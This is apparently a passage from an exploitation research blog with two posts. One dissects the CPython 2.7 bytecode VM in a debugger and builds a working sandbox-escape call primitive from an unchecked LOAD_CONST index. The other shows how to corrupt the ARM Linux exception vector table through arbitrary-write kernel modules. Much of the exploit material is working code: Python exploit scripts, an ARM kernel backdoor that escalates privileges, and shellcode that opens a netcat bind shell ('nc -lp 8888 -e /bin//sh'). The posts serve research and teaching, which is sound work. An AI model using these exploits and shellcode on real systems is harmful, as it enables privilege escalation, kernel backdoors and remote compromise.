Out[24]: 'BINARY_ADD'
In [25]: opcode.opname[0x53]
Out[25]: 'RETURN_VALUE'

Keep in mind, as we said earlier, that everything is an object ; so a function is an object, and bytecode is an object as well:

typedef struct {
  PyObject_HEAD
  PyObject *func_code;  /* A code object */
  // ...
} PyFunctionObject;
/* Bytecode object */
typedef struct {
    PyObject_HEAD
    //...
    PyObject *co_code;    /* instruction opcodes */
    //...
} PyCodeObject;

Time to attach my debugger to the interpreter to see what's going on in that weird-machine, and to place a conditional breakpoint on PyEval_EvalFrameEx. Once you did that, you can call the dummy function:

0:000> bp python27!PyEval_EvalFrameEx+0x2b2 ".if(poi(ecx+4) == 0x53170001){}.else{g}"
breakpoint 0 redefined

0:000> g
eax=025ea914 ebx=00000000 ecx=025ea914 edx=026bef98 esi=1e222c0c edi=02002e38
eip=1e0ec562 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea914=7c

0:000> db ecx l8
025ea914  7c 00 00 7c 01 00 17 53                          |..|...S

OK perfect, we are in the middle of the VM, and our function is being evaluated. The register ECX points to the bytecode being evaluated, and the first opcode is LOAD_FAST.

Basically, this opcode takes an object in the fastlocals array, and push it on the virtual stack. In our case, as we saw in both the disassembly and the bytecode dump, we are going to load the index 0 (the argument b), then the index 1 (argument c).

Here's what it looks like in the debugger ; first step is to load the LOAD_FAST opcode:

0:000>
eax=025ea914 ebx=00000000 ecx=025ea914 edx=026bef98 esi=1e222c0c edi=02002e38
eip=1e0ec562 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea914=7c

In ECX we have a pointer onto the opcodes of the function being evaluated, our dummy function. 0x7c is the value of the LOAD_FAST opcode as we can see:

#define LOAD_FAST 124 /* Local variable number */

Then, the function needs to check if the opcode has argument or not, and that's done by comparing the opcode with a constant value called HAVE_ARGUMENT:

0:000>
eax=0000007c ebx=00000000 ecx=025ea915 edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec568 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b8:
1e0ec568 83f85a          cmp     eax,5Ah

Again, we can verify the value to be sure we understand what we are doing:

In [11]: '%x' % opcode.HAVE_ARGUMENT
Out[11]: '5a'

Definition of HAS_ARG in C:

#define HAS_ARG(op) ((op) >= HAVE_ARGUMENT)

If the opcode has an argument, the function needs to retrieve it (it's one byte):

0:000>
eax=0000007c ebx=00000000 ecx=025ea915 edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec571 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
python27!PyEval_EvalFrameEx+0x2c1:
1e0ec571 0fb67901        movzx   edi,byte ptr [ecx+1]       ds:002b:025ea916=00

As expected for the first LOAD_FAST the argument is 0x00, perfect. After that the function dispatches the execution flow to the LOAD_FAST case defined as follow:

#define GETLOCAL(i)     (fastlocals[i])
#define Py_INCREF(op) (                         \
    _Py_INC_REFTOTAL  _Py_REF_DEBUG_COMMA       \
    ((PyObject*)(op))->ob_refcnt++)
#define PUSH(v)                BASIC_PUSH(v)
#define BASIC_PUSH(v)     (*stack_pointer++ = (v))

case LOAD_FAST:
  x = GETLOCAL(oparg);
  if (x != NULL) {
    Py_INCREF(x);
    PUSH(x);
    goto fast_next_opcode;
  }
  //...
  break;

Let's see what it looks like in assembly:

0:000>
eax=0000007c ebx=00000000 ecx=0000007b edx=00000059 esi=1e222c0c edi=00000000
eip=1e0ec5cf esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
python27!PyEval_EvalFrameEx+0x31f:
1e0ec5cf 8b54246c        mov     edx,dword ptr [esp+6Ch] ss:002b:0027fd44=98ef6b02

After getting the fastlocals, we can retrieve an entry:

0:000>
eax=0000007c ebx=00000000 ecx=0000007b edx=026bef98 esi=1e222c0c edi=00000000
eip=1e0ec5d3 esp=0027fcd8 ebp=026bf0d8 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
python27!PyEval_EvalFrameEx+0x323:
1e0ec5d3 8bb4ba38010000  mov     esi,dword ptr [edx+edi*4+138h] ds:002b:026bf0d0=a0aa5e02

Also keep in mind we called our dummy function with two strings, so let's actually check it is a string object:

0:000> dps 025eaaa0 l2
025eaaa0  00000004
025eaaa4  1e226798 python27!PyString_Type

Perfect, now according to the definition of PyStringObject:

typedef struct {
    PyObject_VAR_HEAD
    long ob_shash;
    int ob_sstate;
    char ob_sval[1];
} PyStringObject;

We should find the content of the string directly in the object:

0:000> db 025eaaa0 l1f
025eaaa0  04 00 00 00 98 67 22 1e-05 00 00 00 dd 16 30 43  .....g".......0C
025eaab0  01 00 00 00 48 65 6c 6c-6f 00 00 00 ff ff ff     ....Hello......

Awesome, we have the size of the string at the offset 0x8, and the actual string is at 0x14.

Let's move on to the second opcode now, this time with less details though:

0:000> 
eax=0000007c ebx=00000000 ecx=025ea917 edx=026bef98 esi=025eaaa0 edi=00000000
eip=1e0ec562 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea917=7c

This time, we are loading the second argument, so the index 1 of fastlocals. We can type-check the object and dump the string stored in it:

0:000> 
eax=0000007c ebx=00000000 ecx=0000007b edx=026bef98 esi=025eaaa0 edi=00000001
eip=1e0ec5d3 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200283
python27!PyEval_EvalFrameEx+0x323:
1e0ec5d3 8bb4ba38010000  mov     esi,dword ptr [edx+edi*4+138h] ds:002b:026bf0d4=c0af5e02
0:000> db poi(026bf0d4) l1f
025eafc0  04 00 00 00 98 67 22 1e-05 00 00 00 39 4a 25 29  .....g".....9J%)
025eafd0  01 00 00 00 57 6f 72 6c-64 00 5e 02 79 00 00     ....World.^.y..

Comes now the BINARY_ADD opcode:

0:000> 
eax=0000007c ebx=00000000 ecx=025ea91a edx=026bef98 esi=025eafc0 edi=00000001
eip=1e0ec562 esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea91a=17

Here it's supposed to retrieve the two objects on the top-of-stack, and add them. The C code looks like this:

#define SET_TOP(v)        (stack_pointer[-1] = (v))

case BINARY_ADD:
  w = POP();
  v = TOP();
  if (PyInt_CheckExact(v) && PyInt_CheckExact(w)) {
    // Not our case
  }
  else if (PyString_CheckExact(v) &&
            PyString_CheckExact(w)) {
      x = string_concatenate(v, w, f, next_instr);
      /* string_concatenate consumed the ref to v */
      goto skip_decref_vx;
  }
  else {
    // Not our case
  }
  Py_DECREF(v);
skip_decref_vx:
  Py_DECREF(w);
  SET_TOP(x);
  if (x != NULL) continue;
  break;

And here is the assembly version where it retrieves the two objects from the top-of-stack:

0:000> 
eax=00000017 ebx=00000000 ecx=00000016 edx=0000000f esi=025eafc0 edi=00000000
eip=1e0eccf5 esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200287
python27!PyEval_EvalFrameEx+0xa45:
1e0eccf5 8b75f8          mov     esi,dword ptr [ebp-8] ss:002b:026bf0d8=a0aa5e02
...

0:000> 
eax=1e226798 ebx=00000000 ecx=00000016 edx=0000000f esi=025eaaa0 edi=00000000
eip=1e0eccfb esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200287
python27!PyEval_EvalFrameEx+0xa4b:
1e0eccfb 8b7dfc          mov     edi,dword ptr [ebp-4] ss:002b:026bf0dc=c0af5e02

0:000> 
eax=1e226798 ebx=00000000 ecx=00000016 edx=0000000f esi=025eaaa0 edi=025eafc0
eip=1e0eccfe esp=0027fcd8 ebp=026bf0e0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200287
python27!PyEval_EvalFrameEx+0xa4e:
1e0eccfe 83ed04          sub     ebp,4

A bit further we have our string concatenation:

0:000> 
eax=025eafc0 ebx=00000000 ecx=0027fcd0 edx=026bef98 esi=025eaaa0 edi=025eafc0
eip=1e0eb733 esp=0027fcb8 ebp=00000005 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
python27!PyEval_SliceIndex+0x813:
1e0eb733 e83881fcff      call    python27!PyString_Concat (1e0b3870)

0:000> dd esp l3
0027fcb8  0027fcd0 025eafc0 025eaaa0

0:000> p
eax=025eaaa0 ebx=00000000 ecx=00000064 edx=000004fb esi=025eaaa0 edi=025eafc0
eip=1e0eb738 esp=0027fcb8 ebp=00000005 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
python27!PyEval_SliceIndex+0x818:
1e0eb738 8b442418        mov     eax,dword ptr [esp+18h] ss:002b:0027fcd0=c0aa5e02

0:000> db poi(0027fcd0) l1f
025eaac0  01 00 00 00 98 67 22 1e-0a 00 00 00 ff ff ff ff  .....g".........
025eaad0  00 00 00 00 48 65 6c 6c-6f 57 6f 72 6c 64 00     ....HelloWorld.

And the last part of the case is to push the resulting string onto the virtual stack (SET_TOP operation):

0:000> 
eax=025eaac0 ebx=025eaac0 ecx=00000005 edx=000004fb esi=025eaaa0 edi=025eafc0
eip=1e0ecb82 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200213
python27!PyEval_EvalFrameEx+0x8d2:
1e0ecb82 895dfc          mov     dword ptr [ebp-4],ebx ss:002b:026bf0d8=a0aa5e02

Last part of our deep dive, the RETURN_VALUE opcode:

0:000> 
eax=025eaac0 ebx=025eafc0 ecx=025ea91b edx=026bef98 esi=025eaac0 edi=025eafc0
eip=1e0ec562 esp=0027fcd8 ebp=026bf0dc iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
python27!PyEval_EvalFrameEx+0x2b2:
1e0ec562 0fb601          movzx   eax,byte ptr [ecx]         ds:002b:025ea91b=53

All right, at least now you have a more precise idea about how that Python virtual machine works, and more importantly how you can directly debug it without symbols. Of course, you can download the debug symbols on Linux and use that information in gdb ; it should make your life easier (....but I hate gdb man...).

Note that I would love very much to have a debugger at the Python bytecode level, it would be much easier than instrumenting the interpreter. If you know one ping me! If you build one ping me too :-).

The bug

Here is the bug, spot it and give it some love:

#ifndef Py_DEBUG
#define GETITEM(v, i) PyTuple_GET_ITEM((PyTupleObject *)(v), (i))
#else
//...
/* Macro, trading safety for speed <-- LOL, :) */ 
#define PyTuple_GET_ITEM(op, i) (((PyTupleObject *)(op))->ob_item[i])

case LOAD_CONST:
  x = GETITEM(consts, oparg);
  Py_INCREF(x);
  PUSH(x);
  goto fast_next_opcode;

This may be a bit obscure for you, but keep in mind we control the index oparg and the content of consts. That means we can just push untrusted data on the virtual stack of the VM: brilliant. Getting a crash out of this bug is fairly easy, try to run these lines (on a Python 2.7 distribution):

import opcode
import types

def a():
  pass

a.func_code = types.CodeType(
  0, 0, 0, 0,
  chr(opcode.opmap['EXTENDED_ARG']) + '\xef\xbe' +
  chr(opcode.opmap['LOAD_CONST'])   + '\xad\xde',
  (), (), (), '', '', 0, ''
)
a()

..and as expected you get a fault (oparg is edi):

(2058.2108): Access violation - code c0000005 (!!! second chance !!!)
[...]
eax=01cb1030 ebx=00000000 ecx=00000063 edx=00000046 esi=1e222c0c edi=beefdead
eip=1e0ec5f7 esp=0027e7f8 ebp=0273a9f0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010287
python27!PyEval_EvalFrameEx+0x347:
1e0ec5f7 8b74b80c        mov     esi,dword ptr [eax+edi*4+0Ch] ds:002b:fd8a8af0=????????

By the way, some readers might have caught the same type of bug in LOAD_FAST with the fastlocals array ; those readers are definitely right :).

Walking through the PoC

OK, so if you look only at the faulting instruction you could say that the bug is minor and we won't be able to turn it into something "useful". But the essential piece when you want to exploit a software is to actually completely understand how it works. Then you are more capable of turning bugs that seems useless into interesting primitives.

As we said several times, from Python code you can't really push any value you want onto the Python virtual stack, obviously. The machine is only dealing with Python objects. However, with this bug we can corrupt the virtual stack by pushing arbitrary data that we control. If you do that well, you can end up causing the Python VM to call whatever address you want. That's exactly what I did back when I wrote python27_abuse_vm_to_execute_x86_code.py.

In Python we are really lucky because we can control a lot of things in memory and we have natively a way to "leak" (I shouldn't call that a leak though because it's a feature) the address of a Python object with the function id. So basically we can do stuff, we can do it reliably and we can manage to not break the interpreter, like bosses.

Pushing attacker-controlled data on the virtual stack

We control oparg and the content of the tuple consts. We can also find out the address of that tuple. So we can have a Python string object that stores an arbitrary value, let's say 0xdeadbeef and it will be pushed on the virtual stack.

Let's do that in Python now:

import opcode
import types
import struct

def pshort(s):
    return struct.pack('<H', s)

def a():
  pass

consts = ()
s = '\xef\xbe\xad\xde'
address_s = id(s) + 20 # 20 is the offset of the array of byte we control in the string
address_consts = id(consts)
# python27!PyEval_EvalFrameEx+0x347:
# 1e0ec5f7 8b74b80c        mov     esi,dword ptr [eax+edi*4+0Ch] ds:002b:fd8a8af0=????????
offset = ((address_s - address_consts - 0xC) / 4) & 0xffffffff
high = offset >> 16
low =  offset & 0xffff
print 'Consts tuple @%#.8x' % address_consts
print 'Address of controled data @%#.8x' % address_s
print 'Offset between const and our object: @%#.8x' % offset
print 'Going to push [%#.8x] on the virtual stack' % (address_consts + (address_s - address_consts - 0xC) + 0xc)

a.func_code = types.CodeType(
  0, 0, 0, 0,
  chr(opcode.opmap['EXTENDED_ARG']) + pshort(high) +
  chr(opcode.opmap['LOAD_CONST'])   + pshort(low),
  consts, (), (), '', '', 0, ''
)
a()

..annnnd..

D:\>python 1.py
Consts tuple @0x01db1030
Address of controled data @0x022a0654
Offset between const and our object: @0x0013bd86
Going to push [0x022a0654] on the virtual stack

*JIT debugger pops*

eax=01db1030 ebx=00000000 ecx=00000063 edx=00000046 esi=deadbeef edi=0013bd86
eip=1e0ec5fb esp=0027fc68 ebp=01e63fc0 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010287
python27!PyEval_EvalFrameEx+0x34b:
1e0ec5fb ff06            inc     dword ptr [esi]      ds:002b:deadbeef=????????

0:000> ub eip l1
python27!PyEval_EvalFrameEx+0x347:
1e0ec5f7 8b74b80c        mov     esi,dword ptr [eax+edi*4+0Ch]

0:000> ? eax+edi*4+c
Evaluate expression: 36308564 = 022a0654

0:000> dd 022a0654 l1
022a0654  deadbeef <- the data we control in our PyStringObject

0:000> dps 022a0654-0n20 l2
022a0640  00000003
022a0644  1e226798 python27!PyString_Type

Perfect, we control a part of the virtual stack :).

Game over, LOAD_FUNCTION

Once you control the virtual stack, the only limit is your imagination and the ability you have to find an interesting spot in the virtual machine. My idea was to use the CALL_FUNCTION opcode to craft a PyFunctionObject somehow, push it onto the virtual stack and to use the magic opcode.

typedef struct {
  PyObject_HEAD
  PyObject *func_code;  /* A code object */
  PyObject *func_globals; /* A dictionary (other mappings won't do) */
  PyObject *func_defaults;  /* NULL or a tuple */
  PyObject *func_closure; /* NULL or a tuple of cell objects */
  PyObject *func_doc;   /* The __doc__ attribute, can be anything */
  PyObject *func_name;  /* The __name__ attribute, a string object */
  PyObject *func_dict;  /* The __dict__ attribute, a dict or NULL */
  PyObject *func_weakreflist; /* List of weak references */
  PyObject *func_module;  /* The __module__ attribute, can be anything */
} PyFunctionObject;

The thing is, as we saw earlier, the virtual machine usually ensures the type of the object it handles. If the type checking fails, the function bails out and we are not happy, at all. It means we would need an information-leak to obtain a pointer to the PyFunction_Type static variable.

Fortunately for us, the CALL_FUNCTION can still be abused without knowing that magic pointer to craft correctly our object. Let's go over the source code to illustrate my sayings:

case CALL_FUNCTION:
{
  PyObject **sp;
  PCALL(PCALL_ALL);
  sp = stack_pointer;
  x = call_function(&sp, oparg);

static PyObject *
call_function(PyObject ***pp_stack, int oparg)
{
  int na = oparg & 0xff;
  int nk = (oparg>>8) & 0xff;
  int n = na + 2 * nk;
  PyObject **pfunc = (*pp_stack) - n - 1;
  PyObject *func = *pfunc;
  PyObject *x, *w;

  if (PyCFunction_Check(func) && nk == 0) {
    // ..Nope..
  } else {
    if (PyMethod_Check(func) && PyMethod_GET_SELF(func) != NULL) {
      // ..Still Nope...
    } else
    if (PyFunction_Check(func))
      // Nope!
    else
      x = do_call(func, pp_stack, na, nk);

static PyObject *
do_call(PyObject *func, PyObject ***pp_stack, int na, int nk)
{
  // ...
  if (PyCFunction_Check(func)) {
    // Nope
  }
  else
    result = PyObject_Call(func, callargs, kwdict);

PyObject *
PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw)
{
  ternaryfunc call;

  if ((call = func->ob_type->tp_call) != NULL) {
    PyObject *result;
    // Yay an interesting call :)
    result = (*call)(func, arg, kw);

So basically the idea to use CALL_FUNCTION was a good one, but we will need to craft two different objects:

  1. The first one will be a PyObject with ob_type pointing to the second object
  2. The second object will be a _typeobject with tp_call the address you want to call

This is fairly trivial to do and will give us an absolute-call primitive without crashing the interpreter: s.w.e.e.t.

import opcode
import types
import struct

def pshort(s):
  return struct.pack('<H', s)

def puint(s):
  return struct.pack('<I', s)

def a():
  pass

PyStringObject_to_char_array_offset = 20
second_object = 'A' * 0x40 + puint(0xdeadbeef)
addr_second_object = id(second_object)
addr_second_object_controled_data = addr_second_object + PyStringObject_to_char_array_offset

first_object = 'AAAA' + puint(addr_second_object_controled_data)
addr_first_object = id(first_object)
addr_first_object_controled_data = addr_first_object + PyStringObject_to_char_array_offset

consts = ()
s = puint(addr_first_object_controled_data)
address_s = id(s) + PyStringObject_to_char_array_offset
address_consts = id(consts)
offset = ((address_s - address_consts - 0xC) / 4) & 0xffffffff

a.func_code = types.CodeType(
  0, 0, 0, 0,
  chr(opcode.opmap['EXTENDED_ARG'])  + pshort(offset >> 16)     +
  chr(opcode.opmap['LOAD_CONST'])    + pshort(offset & 0xffff)  +
  chr(opcode.opmap['CALL_FUNCTION']) + pshort(0),
  consts, (), (), '', '', 0, ''
)
a()

And we finally get our primitive working :-)

(11d0.11cc): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Python\Python275\python27.dll - 
eax=01cc1030 ebx=00000000 ecx=00422e78 edx=00000000 esi=deadbeef edi=02e62df4
eip=deadbeef esp=0027e78c ebp=02e62df4 iopl=0         nv up ei ng nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010283
deadbeef ??              ???

So now you know all the nasty things going under the hood with that python27_abuse_vm_to_execute_x86_code.py script!

Conclusion, Ideas

After reading this little post you are now aware that if you want to sandbox efficiently Python, you should do it outside of Python and not by preventing the use of some modules or things like that: this is broken by design. The virtual machine is not safe enough to build a strong sandbox inside Python, so don't rely on such thing if you don't want to get surprised. An article about that exact same thing was written here if you are interested: The failure of pysandbox.

You also may want to look at PyPy's sandboxing capability if you are interested in executing untrusted Python code. Otherwise, you can build your own SECCOMP-based system :).

On the other hand, I had a lot of fun taking a deep dive into Python's source code and I hope you had some too! If you would like to know more about the low level aspects of Python here are a list of interesting posts:

Folks, that's all for today ; don't hesitate to contact us if you have a cool post!

Corrupting the ARM Exception Vector Table

Introduction

A few months ago, I was writing a Linux kernel exploitation challenge on ARM in an attempt to learn about kernel exploitation and I thought I'd explore things a little. I chose the ARM architecture mainly because I thought it would be fun to look at. This article is going to describe how the ARM Exception Vector Table (EVT) can aid in kernel exploitation in case an attacker has a write what-where primitive. It will be covering a local exploit scenario as well as a remote exploit scenario. Please note that corrupting the EVT has been mentioned in the paper "Vector Rewrite Attack"[1], which briefly talks about how it can be used in NULL pointer dereference vulnerabilities on an ARM RTOS.

The article is broken down into two main sections. First a brief description of the ARM EVT and its implications from an exploitation point of view (please note that a number of things about the EVT will be omitted to keep this article relatively short). We will go over two examples showing how we can abuse the EVT.

I am assuming the reader is familiar with Linux kernel exploitation and knows some ARM assembly (seriously).

ARM Exceptions and the Exception Vector Table

In a few words, the EVT is to ARM what the IDT is to x86. In the ARM world, an exception is an event that causes the CPU to stop or pause from executing the current set of instructions. When this exception occurs, the CPU diverts execution to another location called an exception handler. There are 7 exception types and each exception type is associated with a mode of operation. Modes of operation affect the processor's "permissions" in regards to system resources. There are in total 7 modes of operation. The following table maps some exception types to their associated modes of operation:

Exception                   |       Mode            |     Description
----------------------------|-----------------------|-------------------------------------------------------------------
Fast Interrupt Request      |      FIQ              |   interrupts requiring fast response and low latency.
Interrupt Request           |      IRQ              |   used for general-purpose interrupt handling.
Software Interrupt or RESET |      Supervisor Mode  |   protected mode for the operating system.
Prefetch or Data Abort      |      Abort Mode       |   when fetching data or an instruction from invalid/unmmaped memory.
Undefined Instruction       |      Undefined Mode   |   when an undefined instruction is executed.

The other two modes are User Mode which is self explanatory and System Mode which is a privileged user mode for the operating system

The Exceptions

The exceptions change the processor mode and each exception has access to a set of banked registers. These can be described as a set of registers that exist only in the exception's context so modifying them will not affect the banked registers of another exception mode. Different exception modes have different banked registers:

Banked Registers

The Exception Vector Table

The vector table is a table that actually contains control transfer instructions that jump to the respective exception handlers. For example, when a software interrupt is raised, execution is transfered to the software interrupt entry in the table which in turn will jump to the syscall handler. Why is the EVT so interesting to target? Well because it is loaded at a known address in memory and it is writeable* and executable. On 32-bit ARM Linux this address is 0xffff0000. Each entry in the EVT is also at a known offset as can be seen on the following table:

Exception                   |       Address            
----------------------------|-----------------------
Reset                       |      0xffff0000           
Undefined Instruction       |      0xffff0004       
SWI                         |      0xffff0008  
Prefetch Abort              |      0xffff000c       
Data Abort                  |      0xffff0010 
Reserved                    |      0xffff0014  
IRQ                         |      0xffff0018   
FIQ                         |      0xffff001c  

A note about the Undefined Instruction exception

Overwriting the Undefiend Instruction vector seems like a great plan but it actually isn't because it is used by the kernel. Hard float and Soft float are two solutions that allow emulation of floating point instructions since a lot of ARM platforms do not have hardware floating point units. With soft float, the emulation code is added to the userspace application at compile time. With hard float, the kernel lets the userspace application use the floating point instructions as if the CPU supported them and then using the Undefined Instruction exception, it emulates the instruction inside the kernel.

If you want to read more on the EVT, checkout the references at the bottom of this article, or google it.

Corrupting the EVT

There are few vectors we could use in order to obtain privileged code execution. Clearly, overwriting any vector in the table could potentially lead to code execution, but as the lazy people that we are, let's try to do the least amount of work. The easiest one to overwrite seems to be the Software Interrupt vector. It is executing in process context, system calls go through there, all is well. Let's now go through some PoCs/examples. All the following examples have been tested on Debian 7 ARMel 3.2.0-4-versatile running in qemu.

Local scenario

The example vulnerable module implements a char device that has a pretty blatant arbitrary-write vulnerability( or is it a feature?):

// called when 'write' system call is done on the device file
static ssize_t on_write(struct file *filp,const char *buff,size_t len,loff_t *off)
{
    size_t siz = len;
    void * where = NULL;
    char * what = NULL;

    if(siz > sizeof(where))
        what = buff + sizeof(where);
    else
        goto end;

    copy_from_user(&where, buff, sizeof(where));
    memcpy(where, what, sizeof(void *));

end:
    return siz;
}

Basically, with this cool and realistic vulnerability, you give the module an address followed by data to write at that address. Now, our plan is going to be to backdoor the kernel by overwriting the SWI exception vector with code that jumps to our backdoor code. This code will check for a magic value in a register (say r7 which holds the syscall number) and if it matches, it will elevate the privileges of the calling process. Where do we store this backdoor code ? Considering the fact that we have an arbitrary write to kernel memory, we can either store it in userspace or somewhere in kernel space. The good thing about the latter choice is that if we choose an appropriate location in kernel space, our code will exist as long as the machine is running, whereas with the former choice, as soon as our user space application exits, the code is lost and if the entry in the EVT isn't set back to its original value, it will most likely be pointing to invalid/unmmapped memory which will crash the system. So we need a location in kernel space that is executable and writeable. Where could this be ? Let's take a closer look at the EVT:

EVT Disassembly

As expected we see a bunch of control transfer instructions but one thing we notice about them is that "closest" referenced address is 0xffff0200. Let's take a look what is between the end of the EVT and 0xffff0200:
EVT Inspection

It looks like nothing is there so we have around 480 bytes to store our backdoor which is more than enough.

The Exploit

Recapitulating our exploit:
1. Store our backdoor at 0xffff0020.
2. Overwrite the SWI exception vector with a branch to 0xffff0020.
3. When a system call occurs, our backdoor will check if r7 == 0xb0000000 and if true, elevate the privileges of the calling process otherwise jump to the normal system call handler.
Here is the backdoor's code:

;check if magic
    cmp     r7, #0xb0000000
    bne     exit

elevate:
    stmfd   sp!,{r0-r12}

    mov     r0, #0
    ldr     r3, =0xc0049a00     ;prepare_kernel_cred
    blx     r3
    ldr     r4, =0xc0049438     ;commit_creds
    blx     r4

    ldmfd   sp!, {r0-r12, pc}^  ;return to userland

;go to syscall handler
exit:
    ldr     pc, [pc, #980]      ;go to normal swi handler

You can find the complete code for the vulnerable module and the exploit here. Run the exploit:

Local PoC

Remote scenario

For this example, we will use a netfilter module with a similar vulnerability as the previous one:

if(ip->protocol == IPPROTO_TCP){
    tcp = (struct tcphdr *)(skb_network_header(skb) + ip_hdrlen(skb));
    currport = ntohs(tcp->dest);
    if((currport == 9999)){
        tcp_data = (char *)((unsigned char *)tcp + (tcp->doff * 4));
        where = ((void **)tcp_data)[0];
        len = ((uint8_t *)(tcp_data + sizeof(where)))[0];
        what = tcp_data + sizeof(where) + sizeof(len);
        memcpy(where, what, len);
    }
}

Just like the previous example, this module has an awesome feature that allows you to write data to anywhere you want. Connect on port tcp/9999 and just give it an address, followed by the size of the data and the actual data to write there. In this case we will also backdoor the kernel by overwriting the SWI exception vector and backdooring the kernel. The code will branch to our shellcode which we will also, as in the previous example, store at 0xffff020. Overwriting the SWI vector is especially a good idea in this remote scenario because it will allow us to switch from interrupt context to process context. So our backdoor will be executing in a context with a backing process and we will be able to "hijack" this process and overwrite its code segment with a bind shell or connect back shell. But let's not do it that way. Let's check something real quick:

cat /proc/self/maps

Would you look at that, on top of everything else, the EVT is a shared memory segment. It is executable from user land and writeable from kernel land*. Instead of overwriting the code segment of a process that is making a system call, let's just store our code in the EVT right after our first stage and just return there. Every system call goes through the SWI vector so we won't have to wait too much for a process to get caught in our trap.

The Exploit

Our exploit goes:
1. Store our first stage and second stage shellcodes at 0xffff0020 (one after the other).
2. Overwrite the SWI exception vector with a branch to 0xffff0020.
3. When a system call occurs, our first stage shellcode will set the link register to the address of our second stage shellcode (which is also stored in the EVT and which will be executed from userland), and then return to userland.
4. The calling process will "resume execution" at the address of our second stage which is just a bind shell.

Here is the stage 1-2 shellcode:

stage_1:
    adr     lr, stage_2
    push    {lr}
    stmfd   sp!, {r0-r12}
    ldr     r0, =0xe59ff410     ; intial value at 0xffff0008 which is
                                ; ldr     pc, [pc, #1040] ; 0xffff0420
    ldr     r1, =0xffff0008
    str     r0, [r1]
    ldmfd   sp!, {r0-r12, pc}^  ; return to userland

stage_2:
    ldr     r0, =0x6e69622f     ; /bin
    ldr     r1, =0x68732f2f     ; /sh
    eor     r2, r2, r2          ; 0x00000000
    push    {r0, r1, r2}
    mov     r0, sp

    ldr     r4, =0x0000632d     ; -c\x00\x00
    push    {r4}
    mov     r4, sp

    ldr     r5, =0x2d20636e
    ldr     r6, =0x3820706c
    ldr     r7, =0x20383838     ; nc -lp 8888 -e /bin//sh
    ldr     r8, =0x2f20652d
    ldr     r9, =0x2f6e6962
    ldr     r10, =0x68732f2f

    eor     r11, r11, r11
    push    {r5-r11}
    mov     r5, sp
    push    {r2}

    eor     r6, r6, r6
    push    {r0,r4,r5, r6}
    mov     r1, sp
    mov     r7, #11
    swi     0x0

    mov     r0, #99
    mov     r7, #1
    swi     0x0

You can find the complete code for the vulnerable module and the exploit here. Run the exploit:

Remote PoC

Bonus: Interrupt Stack Overflow

It seems like the Interrupt Stack is adjacent to the EVT in most memory layouts. Who knows what kind of interesting things would happen if there was something like a stack overflow ?

A Few Things about all this

  • The techniques discussed in this article make the assumption that the attack has knowledge of the kernel addresses which might not always be the case.
  • The location where we are storing our shellcode (0xffff0020) might or might not be used by another distro's kernel.
  • The exampe codes I wrote here are merely PoCs; they could definitely be improved. For example, on the remote scenario, if it turns out that the init process is the process being hijacked, the box will crash after we exit from the bind shell.
  • If you hadn't noticed, the "vulnerabilities" presented here, aren't really vulnerabilities but that is not the point of this article.

*: It seems like the EVT can be mapped read-only and therfore there is the possibility that it might not be writeable in newer/some versions of the Linux kernel.

Final words

Among other things, grsec prevents the modification of the EVT by making the page read-only. If you want to play with some fun kernel challenges checkout the "kernelpanic" branch on w3challs.
Cheers, @amatcama

